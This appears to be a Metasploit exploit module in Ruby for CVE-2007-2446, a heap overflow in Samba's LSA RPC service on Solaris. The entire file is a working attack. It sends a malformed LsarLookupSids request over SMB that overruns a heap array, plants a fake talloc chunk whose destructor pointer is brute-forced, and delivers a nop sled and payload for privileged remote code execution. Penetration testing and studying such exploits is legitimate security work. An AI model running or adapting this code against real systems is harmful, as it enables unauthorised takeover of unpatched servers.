##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
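class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Brute

  # LSARPC interface identity used for the named-pipe bind.
  LSARPC_UUID = '12345778-1234-abcd-ef00-0123456789ab'.freeze
  LSARPC_VERSION = '0.0'.freeze

  # LSARPC opnums used by this module.
  LSA_OPEN_POLICY_OPNUM = 6
  LSA_LOOKUP_SIDS_OPNUM = 0x0f

  # Counts placed in the LsarLookupSids request. The inner array count
  # (NUM_ENTRIES2) is deliberately larger than the outer one (NUM_ENTRIES);
  # that mismatch is what the vulnerable lsa_io_trans_names parser trusts
  # (CVE-2007-2446).
  NUM_ENTRIES = 272
  NUM_ENTRIES2 = 288

  # TALLOC_MAGIC in wire (little-endian) byte order; it goes in the 'flags'
  # field of the fake talloc chunk header. Tagged as binary so appending it to
  # the buffer never trips Ruby's encoding-compatibility check.
  TALLOC_MAGIC = "\x70\xec\x14\xe8".b.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samba lsa_io_trans_names Heap Overflow',
        'Description' => %q{
          This module triggers a heap overflow in the LSA RPC service
          of the Samba daemon. This module uses the TALLOC chunk overwrite
          method (credit Ramon and Adriano), which only works with Samba
          versions 3.0.21-3.0.24. Additionally, this module will not work
          when the Samba "log level" parameter is higher than "2".
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
          'hdm'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2007-2446'],
          ['OSVDB', '34699'],
        ],
        'Privileged' => true,
        'Payload' => {
          'Space' => 1024,
        },
        'Platform' => 'solaris',
        # Each target brute-forces 'Ret' in 60 KiB steps while the nop sled is
        # 64 KiB, so the sleds of consecutive guesses overlap.
        'Targets' => [
          [
            'Solaris 8/9/10 x86 Samba 3.0.21-3.0.24',
            {
              'Platform' => 'solaris',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' => {
                'Start' => { 'Ret' => 0x082f2000 },
                'Stop' => { 'Ret' => 0x084f2000 },
                'Step' => 60 * 1024,
              }
            }
          ],
          [
            'Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24',
            {
              'Platform' => 'solaris',
              'Arch' => [ ARCH_SPARC ],
              'Nops' => 64 * 1024,
              'Bruteforce' => {
                'Start' => { 'Ret' => 0x00322000 },
                'Stop' => { 'Ret' => 0x00722000 },
                'Step' => 60 * 1024,
              }
            }
          ],
          # Single fixed, recognisable destructor value for debugging the
          # overwrite under a debugger; Start == Stop so only one request is sent.
          [
            'DEBUG',
            {
              'Platform' => 'solaris',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64 * 1024,
              'Bruteforce' => {
                'Start' => { 'Ret' => 0xaabbccdd },
                'Stop' => { 'Ret' => 0xaabbccdd },
                'Step' => 60 * 1024,
              }
            }
          ],
        ],
        'DisclosureDate' => '2007-05-14',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
      ]
    )
  end

  # Opt out of automatic targeting: there is no version probe here, the
  # brute-force loop is the only way this module finds a working address.
  def autofilter
    false
  end

  # One brute-force iteration: connect and authenticate over SMB, bind to
  # LSARPC, open a policy handle and send the malformed LsarLookupSids request
  # whose fake talloc chunk carries target_addrs['Ret'] as the destructor.
  #
  # The SMB connection is always torn down, even when the bind, the policy
  # open or the overflow request raises, so a long brute-force run does not
  # leak a socket per failed attempt.
  #
  # @param target_addrs [Hash] the current brute-force step; only 'Ret' is used
  # @return [void]
  def brute_exploit(target_addrs)
    ret = target_addrs['Ret']
    print_status("Trying to exploit Samba with address 0x%.8x..." % ret)

    pipe = datastore['SMBPIPE'].downcase

    print_status("Connecting to the SMB service...")
    connect
    begin
      smb_login

      # Force a plain single-context bind. Note this datastore write is not
      # undone and persists for the rest of the module run.
      datastore['DCERPC::fake_bind_multi'] = false

      handle = dcerpc_handle(LSARPC_UUID, LSARPC_VERSION, 'ncacn_np', ["\\#{pipe}"])
      print_status("Binding to #{handle} ...")
      dcerpc_bind(handle)
      print_status("Bound to #{handle} ...")

      # The LookupSids stub starts with the policy handle returned by OpenPolicy.
      stub = lsa_open_policy(dcerpc)
      stub << lookup_sids_stub(ret)

      print_status("Calling the vulnerable function...")
      call_lookup_sids(stub)

      handler
    ensure
      disconnect
    end
  end

  # Open an LSA policy handle over the bound LSARPC connection (LsarOpenPolicy)
  # and return the 20-byte context handle the LookupSids stub must start with.
  #
  # @param dcerpc [Rex::Proto::DCERPC::Client] the bound RPC client
  # @param server [String] server name marshalled into the request
  # @return [String] the first 20 bytes of the response (the policy handle)
  def lsa_open_policy(dcerpc, server = "\\")
    stubdata =
      # Server
      NDR.uwstring(server) +
      # Object Attributes
      NDR.long(24) + # SIZE
      NDR.long(0) + # LSPTR
      NDR.long(0) + # NAME
      NDR.long(0) + # ATTRS
      NDR.long(0) + # SEC DES
      # LSA QOS PTR
      NDR.long(1) + # Referent
      NDR.long(12) + # Length
      NDR.long(2) + # Impersonation
      NDR.long(1) + # Context Tracking
      NDR.long(0) + # Effective Only
      # Access Mask
      NDR.long(0x02000000)

    dcerpc.call(LSA_OPEN_POLICY_OPNUM, stubdata)
    resp = dcerpc.last_response.stub_data

    # Per MS-LSAD the response is the 20-byte policy handle followed by a
    # 4-byte NTSTATUS. The original module never looked at the status; keep
    # that control flow but warn, because a rejected OpenPolicy leaves the
    # handle returned below meaningless.
    if resp && resp.length >= 24
      status = resp[20, 4].unpack1('V')
      unless status == 0
        print_warning("LsarOpenPolicy returned NTSTATUS 0x%.8x; the policy handle may be invalid" % status)
      end
    end

    resp[0, 20]
  end

  private

  # Build the nop sled once, sized by the selected target's 'Nops' entry
  # (an empty string when the target asks for none).
  #
  # @return [String]
  def nop_sled
    @nops ||= begin
      if target['Nops'] > 0
        print_status("Creating nop sled....")
        make_nops(target['Nops'])
      else
        ''
      end
    end
  end

  # Fake talloc_chunk header that is overlaid on the heap once the
  # LSA_TRANS_NAME array has been overrun. Field order follows the talloc
  # header the original authors targeted; the destructor field receives the
  # brute-forced return address.
  #
  # @param ret [Integer] value written into the chunk's destructor pointer
  # @return [String] the 36-byte header
  def fake_talloc_chunk(ret)
    chunk = 'A' * 8                    # next, prev
    chunk << NDR.long(0) + NDR.long(0) # parent, child
    chunk << NDR.long(0)               # refs
    chunk << [ret].pack('V')           # destructor
    chunk << 'A' * 4                   # name
    chunk << 'A' * 4                   # size
    chunk << TALLOC_MAGIC              # flags
    chunk
  end

  # LsarLookupSids stub data, excluding the leading policy handle.
  #
  # Each LSA_TRANS_NAME entry is 16 bytes on the wire:
  #   16 bits align, 16 bits sid_name_use, 16 bits uni_str_len,
  #   16 bits uni_max_len, 32 bits buffer, 32 bits domain_idx
  # NUM_ENTRIES filler entries are followed by 8 bytes of padding and the fake
  # talloc header, then the nop sled and the encoded payload.
  #
  # @param ret [Integer] destructor pointer for the fake talloc chunk
  # @return [String]
  def lookup_sids_stub(ret)
    buf = ('A' * 16) * NUM_ENTRIES
    buf << 'A' * 8 # padding
    buf << fake_talloc_chunk(ret)

    stub = NDR.long(0)             # num_entries
    stub << NDR.long(0)            # ptr_sid_enum
    stub << NDR.long(NUM_ENTRIES)  # num_entries
    stub << NDR.long(0x20004)      # ptr_trans_names
    stub << NDR.long(NUM_ENTRIES2) # num_entries2
    stub << buf
    stub << nop_sled
    stub << payload.encoded
    stub
  end

  # Send the LsarLookupSids request and report the outcome. A server that
  # stops answering (no response, EOF, pipe disconnect) is the expected result
  # of the overflow firing; an RPC fault is treated as a sign of a patched
  # build. Anything else is printed so it is not silently lost.
  #
  # @param stub [String] the complete stub data
  # @return [void]
  def call_lookup_sids(stub)
    dcerpc.call(LSA_LOOKUP_SIDS_OPNUM, stub)
  rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
    print_status('Server did not respond, this is expected')
  rescue Rex::Proto::DCERPC::Exceptions::Fault
    print_error('Server is most likely patched...')
  rescue => e
    if e.to_s.match?(/STATUS_PIPE_DISCONNECTED/)
      print_status('Server disconnected, this is expected')
    else
      print_error("Error: #{e.class}: #{e}")
    end
  end
end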